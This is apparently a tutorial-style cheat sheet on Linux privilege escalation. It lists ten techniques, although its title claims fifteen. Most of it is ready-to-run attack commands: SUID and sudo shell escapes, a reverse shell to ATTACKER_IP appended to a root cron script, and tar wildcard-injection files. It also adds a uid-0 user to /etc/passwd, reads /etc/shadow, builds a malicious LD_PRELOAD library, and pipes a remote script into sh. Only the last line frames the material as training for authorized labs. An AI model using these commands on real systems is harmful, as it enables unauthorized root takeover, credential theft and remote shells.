Linux Privilege Escalation: 15 Techniques Hackers Use to Get Root

Why Privilege Escalation Matters

You've gained a shell on a Linux system — but you're a low-privilege user. Privilege escalation is how you go from www-data to root, turning limited access into total system compromise.

In pentesting: Initial access is hard. Privesc is where most targets fall. In defense: If an attacker can't escalate, a shell is far less dangerous.

---

Technique 1: SUID Binary Exploitation

SUID (Set User ID) binaries run with the permissions of their owner — often root.

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \;

# /usr/bin/vim
vim -c ':!/bin/bash'

# /usr/bin/python3
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

# /usr/bin/nmap (older versions)
nmap --interactive
!sh

Check GTFOBins (https://gtfobins.github.io) for exploitation techniques for any binary.

---

Technique 2: Sudo Misconfigurations

# Check what sudo permissions you have
sudo -l

# Example output:
# (ALL) NOPASSWD: /usr/bin/vim
# Exploit: sudo vim -c ':!/bin/bash'

# (ALL) NOPASSWD: /usr/bin/find
# Exploit: sudo find . -exec /bin/bash \;

# (ALL) NOPASSWD: /usr/bin/less
# Exploit: sudo less /etc/passwd → !bash

# (ALL) NOPASSWD: /usr/bin/awk
# Exploit: sudo awk 'BEGIN {system("/bin/bash")}'

# (ALL) NOPASSWD: /usr/bin/env
# Exploit: sudo env /bin/bash

# (ALL) NOPASSWD: /usr/bin/tar
# Exploit: sudo tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

---

Technique 3: Cron Job Exploitation

# Check for cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

# Look for writable scripts executed by root
# If /opt/backup.sh runs as root and you can write to it:
echo '/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# Look for wildcard injection in cron commands
# If cron runs: tar czf /tmp/backup.tar.gz *
# Create exploit files:
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > shell.sh

---

Technique 4: Writable /etc/passwd

# Check if /etc/passwd is writable
ls -la /etc/passwd

# If writable, add a root user:
# Generate password hash
openssl passwd -1 -salt xyz password123

# Add to /etc/passwd
echo 'hacker:$1$xyz$hash_here:0:0::/root:/bin/bash' >> /etc/passwd

# Login as root
su hacker

---

Technique 5: Kernel Exploits

# Check kernel version
uname -a
cat /proc/version

# Search for kernel exploits
# DirtyPipe (CVE-2022-0847) — Linux 5.8+
# DirtyCow (CVE-2016-5195) — Linux 2.6.22 to 4.8.3
# GameOver(lay)  (CVE-2023-2640) — Ubuntu OverlayFS

# Use linux-exploit-suggester
./linux-exploit-suggester.sh

---

Technique 6: Capabilities

# Find binaries with elevated capabilities
getcap -r / 2>/dev/null

# Exploitable capabilities:
# cap_setuid on python3
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_dac_read_search on tar (read any file)
tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
cat etc/shadow

---

Technique 7: Writable Docker Socket

# Check if you're in the docker group
id | grep docker

# If yes — instant root:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

---

Technique 8: PATH Hijacking

# If a SUID binary calls a command without full path:
# e.g., the binary runs "service apache2 restart"

# Create malicious "service" binary in a writable directory
echo '#!/bin/bash' > /tmp/service
echo '/bin/bash -p' >> /tmp/service
chmod +x /tmp/service

# Prepend our directory to PATH
export PATH=/tmp:$PATH

# Run the vulnerable SUID binary — it calls our "service" instead
./vulnerable-binary

---

Technique 9: NFS No Root Squash

# Check for NFS shares with no_root_squash
cat /etc/exports
# /shared *(rw,no_root_squash)

# From attacker machine (as root):
mount -o rw TARGET_IP:/shared /mnt
# Create SUID bash on the shared mount
cp /bin/bash /mnt/rootbash
chmod +s /mnt/rootbash

# On target machine:
/shared/rootbash -p  # Root shell!

---

Technique 10: Environment Variables in SUID Programs

# LD_PRELOAD (if sudo env_keep includes LD_PRELOAD)
# Create malicious shared library:
cat > /tmp/evil.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/evil.so /tmp/evil.c

# Run with LD_PRELOAD
sudo LD_PRELOAD=/tmp/evil.so /usr/bin/any-allowed-sudo-command

---

Automated Enumeration Scripts

# LinPEAS — The gold standard
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# linux-exploit-suggester
./les.sh

---

Quick Reference: Escalation Checklist

# 1. System info
uname -a && cat /etc/os-release

# 2. SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null

# 3. Sudo permissions
sudo -l

# 4. Cron jobs
cat /etc/crontab && ls -la /etc/cron.d/

# 5. Writable files
find / -writable -type f 2>/dev/null | grep -v proc

# 6. Capabilities
getcap -r / 2>/dev/null

# 7. Running processes
ps aux | grep root

# 8. Network services
ss -tlnp

# 9. SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# 10. Passwords in files
grep -rli 'password' /etc/ /opt/ /var/ 2>/dev/null

Understanding these techniques helps defenders identify weaknesses before attackers do. Always practice on authorized systems like HackTheBox, TryHackMe, or your own lab machines.